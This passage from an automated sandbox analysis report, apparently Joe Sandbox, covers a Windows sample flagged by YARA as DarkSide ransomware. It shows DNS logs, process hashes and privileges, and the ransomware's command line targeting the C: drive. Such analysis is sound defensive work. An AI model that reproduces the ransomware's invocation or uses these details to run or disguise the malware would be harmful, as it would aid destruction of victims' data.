                                                                                      May 12, 2021 06:16:30.193411112 CEST5871753192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:30.242543936 CEST53587178.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:31.716988087 CEST5976253192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:31.768779039 CEST53597628.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:33.713272095 CEST5432953192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:33.762053013 CEST53543298.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:34.846426010 CEST5805253192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:34.898863077 CEST53580528.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:35.964937925 CEST5400853192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:36.022229910 CEST53540088.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:38.119664907 CEST5945153192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:38.169435024 CEST53594518.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:41.686724901 CEST5291453192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:41.745548964 CEST53529148.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:44.449434042 CEST6456953192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:44.498147011 CEST53645698.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:46.528011084 CEST5281653192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:46.576726913 CEST53528168.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:49.871068954 CEST5078153192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:49.919935942 CEST53507818.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:51.195636988 CEST5423053192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:51.244385004 CEST53542308.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:52.195091009 CEST5491153192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:52.252332926 CEST53549118.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:52.467114925 CEST4995853192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:52.525242090 CEST53499588.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:54.195868969 CEST5086053192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:54.244698048 CEST53508608.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:16:55.365879059 CEST5045253192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:16:55.437237978 CEST53504528.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:17:12.209161997 CEST5973053192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:17:12.267398119 CEST53597308.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:17:21.004900932 CEST5931053192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:17:21.066346884 CEST53593108.8.8.8192.168.2.7
                                                                                      May 12, 2021 06:17:56.347851992 CEST5191953192.168.2.78.8.8.8
                                                                                      May 12, 2021 06:17:56.397886038 CEST53519198.8.8.8192.168.2.7

                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: P3FwQWmwUM.exe PID: 5976 Parent PID: 5876

                                                                                      General

                                                                                      Start time:06:16:23
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: P3FwQWmwUM.exe PID: 6020 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:24
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000002.00000002.235019158.0000000000537000.00000004.00000020.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: P3FwQWmwUM.exe PID: 1600 Parent PID: 6020

                                                                                      General

                                                                                      Start time:06:16:24
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\P3FwQWmwUM.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000003.00000002.509189468.00000000004F8000.00000004.00000020.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: P3FwQWmwUM.exe PID: 2900 Parent PID: 1600

                                                                                      General

                                                                                      Start time:06:16:25
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Users\user\Desktop\P3FwQWmwUM.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\
                                                                                      Imagebase:0x400000
                                                                                      File size:61784 bytes
                                                                                      MD5 hash:C4DA0137CBB99626FD44DA707AE1BCA8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.432905231.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.362840336.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.327849253.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411060522.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408654426.0000000002B6A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.236181936.00000000007C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.435986395.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.337715138.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.299389052.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000002.516574687.0000000002DA2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.478288044.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.282398886.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.303767851.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.439503040.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.298944879.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.307244631.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.442911884.0000000002E08000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.295652654.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428084952.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288394609.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408145616.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.330427301.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.306781726.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.292805057.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.281893608.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.483773853.0000000002E39000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.297343335.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.282524954.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.433763245.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288157426.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411401825.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.321471581.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.436219840.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.282409788.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.430404279.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411544467.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.432232782.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.474609577.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.407959058.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.429585276.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.328363880.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.236245311.00000000007C8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411912846.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.302439227.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.290040157.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.307472011.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.443960653.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.353326118.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.362876492.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.433058006.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288198091.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.434687514.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.328783962.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.279059079.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411798869.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.293724321.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408432832.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.456394908.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.347522767.0000000002AA7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409934886.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.411159789.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410791890.0000000002B4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.447874704.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.337437975.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.433675898.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.431227855.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408616972.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428965052.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.307770705.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.288409928.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.348924422.0000000002AA7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.280790972.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.280803963.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.492039293.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.440558230.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.294802191.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.440164319.0000000002AB7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.353303558.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.304436022.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428206439.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.443023882.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.293143940.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.432131880.0000000002DB4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409798220.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.428389024.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.289927003.000000000084C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.328127290.0000000000849000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.493025969.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.368476921.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.429695025.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.448359001.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.304226241.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.483856895.0000000002D40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.293461617.0000000002A90000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410319943.0000000002B4D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410677619.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.349425661.0000000002AA7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.321323465.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.311791138.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.337762957.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409162945.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.434752909.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.302198707.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.410205898.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.473912941.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.479859917.0000000002E18000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.439469384.0000000002E08000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.295417556.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.456833891.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.294724805.0000000002AA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.480034130.0000000002D50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.429089053.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.298539675.00000000007F2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409597850.0000000002B69000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.431347630.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.409312887.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.441657546.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.430481720.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.415984076.0000000002B47000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.458381849.0000000002D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.415652999.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.336753706.0000000002B07000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.408806702.0000000002D70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000004.00000003.281911971.000000000084D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 5964 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:36
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
